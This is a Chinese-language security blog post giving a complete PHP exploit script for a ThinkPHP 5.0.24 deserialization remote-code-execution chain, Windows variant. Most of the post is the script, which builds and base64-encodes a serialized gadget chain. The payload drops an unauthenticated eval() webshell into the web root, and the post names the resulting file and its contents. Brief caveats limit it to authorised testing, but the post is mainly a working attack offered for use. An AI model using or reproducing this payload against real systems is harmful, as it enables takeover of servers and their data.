ThinkPHP 5.0.24 反序列化RCE (Windows下EXP)

直接上 EXP（Windows 环境下）。先说明两点：这段脚本只负责生成恶意序列化数据并以 base64 输出，目标应用自身必须存在一处对可控输入调用 `unserialize()` 的入口，利用链本身不提供入口；另外它落地的是一个无鉴权的 `eval` webshell，仅可用于获得授权的测试，测完务必清理。

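<?php
// ThinkPHP 5.0.24 deserialization RCE -- Windows variant of the POP chain.
//
// What this script does: it builds a tree of plain objects whose class
// names, namespaces and property names/visibilities mirror the ThinkPHP
// classes of the same name, serializes the root object and prints the result
// base64-encoded. It does NOT trigger anything by itself: the target
// application must have a sink that calls unserialize() on attacker-
// controlled input. Use it only against systems you are authorised to test.
//
// Object nesting (what the payload actually contains):
//   Windows.files[0] -> Merge.error -> BelongsTo.query -> Output.handle
//   -> Memcache.handler -> Memcached.handler -> File
// How the framework walks that tree at unserialize/destruct time is covered
// by the referenced write-up; the comments below only note what each node
// contributes to the payload.
//
// Keep every property visibility exactly as written. serialize() encodes it
// in the property key (protected -> "\0*\0name", private -> "\0Class\0name"),
// so a mismatch would be unserialized as an unrelated dynamic property and
// the gadget code would never see the value.

namespace think\process\pipes;

// Root object of the chain (the one the sink unserializes first).
class Windows
{
    // Private, so the serialized key is "\0think\process\pipes\Windows\0files";
    // do not change the visibility.
    private $files = [];

    public function __construct()
    {
        // Single element: the next hop of the chain.
        $this->files = [new \think\model\Merge];
    }
}

namespace think\model;

use think\Model;

// Second hop. $append maps an attribute name to a method name ('getError');
// the presumable intent is that the framework calls getError(), which hands
// back $error -- the BelongsTo object -- and control moves on from there.
class Merge extends Model
{
    protected $append = [];
    protected $error;

    public function __construct()
    {
        $this->append = [
            'bb' => 'getError'
        ];
        $this->error = (new \think\model\relation\BelongsTo);
    }
}

namespace think;

// Local stub so that `Merge extends Model` compiles here. It declares no
// properties, so it contributes nothing to the serialized payload.
class Model{}

namespace think\console;

// Fourth hop. $styles carries a method name ('removeWhereField') and $handle
// the next gadget; presumably Output's magic __call checks the name against
// $styles before forwarding, which is why the name is listed here.
class Output
{
    protected $styles = [];
    // Private -> key "\0think\console\Output\0handle"; keep it private.
    private $handle = null;

    public function __construct()
    {
        $this->styles = ['removeWhereField'];
        $this->handle = (new \think\session\driver\Memcache);
    }
}

namespace think\model\relation;

// Third hop: only holds the Output object in $query.
class BelongsTo
{
    protected $query;

    public function __construct()
    {
        $this->query = (new \think\console\Output);
    }
}

namespace think\session\driver;

// Fifth hop: a session driver whose backing handler is the Memcached cache
// driver below. This detour through Memcached::set is what differs from the
// Linux variant of the chain.
class Memcache
{
    protected $handler = null;

    public function __construct()
    {
        $this->handler = (new \think\cache\driver\Memcached);
    }
}

namespace think\cache\driver;

// Last hop: the file cache driver, i.e. the thing that writes to disk.
// 'path' is a php://filter stream: whatever is written through it is
// base64-decoded before landing under ./ -- presumably this is what turns the
// base64 'prefix' of the Memcached node into PHP source on disk.
// cache_subdir=false and an empty prefix presumably keep the file directly
// under ./ with no extra path components.
class File
{
    protected $tag;
    protected $options = [];

    public function __construct()
    {
        $this->tag = false;
        $this->options = [
            'expire'        => 3600,
            'cache_subdir'  => false,
            'prefix'        => '',
            'data_compress' => false,
            'path'          => 'php://filter/convert.base64-decode/resource=./',
        ];
    }
}

// Sixth hop: wraps the File driver above and supplies the payload.
// 'prefix' is the base64 of a tiny PHP file that does eval($_GET['a']) -- an
// unauthenticated eval() webshell reachable through the GET parameter `a`.
// Anyone who finds the dropped file can use it, so on a real engagement swap
// in a payload keyed to you and delete the file when done. tag=true is part
// of how the call is routed through Memcached::set (see the write-up).
class Memcached
{
    protected $tag;
    protected $options = [];
    protected $handler = null;

    public function __construct()
    {
        $this->tag = true;
        $this->options = [
            'expire'   => 0,
            'prefix'   => 'PD9waHAKZXZhbCgkX0dFVFsnYSddKTsKPz4',
        ];
        $this->handler = (new File);
    }
}

// Emit the payload. base64 is only for safe transport/pasting; decode it (or
// adapt the encoding) to match however the target's unserialize() sink takes
// its input.
echo base64_encode(serialize(new \think\process\pipes\Windows));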

  成功触发后会直接在当前目录（`path` 里 `resource=./` 所指的工作目录，一般即站点根目录）下生成一个 webshell。

  名字：8fba8bb6410a4aee90b063a8b7e78b73.php（payload 固定时文件名也固定，可据此检查是否写入成功）

  内容：就是 `Memcached` 节点里 `prefix` 那串 base64 解码后的结果，即 `<?php eval($_GET['a']); ?>`——一个通过 GET 参数 `a` 执行任意 PHP 代码的无鉴权 webshell。

  相对 Linux 下的 EXP 有什么不同呢？

  区别在于利用链多绕了一层：经过 `thinkphp/library/think/cache/driver/Memcached.php` 中 `Memcached` 类的 `set` 方法，再由它持有的 `File` 驱动去落地文件。

  利用得挺巧妙的。

  参考链接:https://xz.aliyun.com/t/7310

原文地址:https://www.cnblogs.com/xiaozhiru/p/12452528.html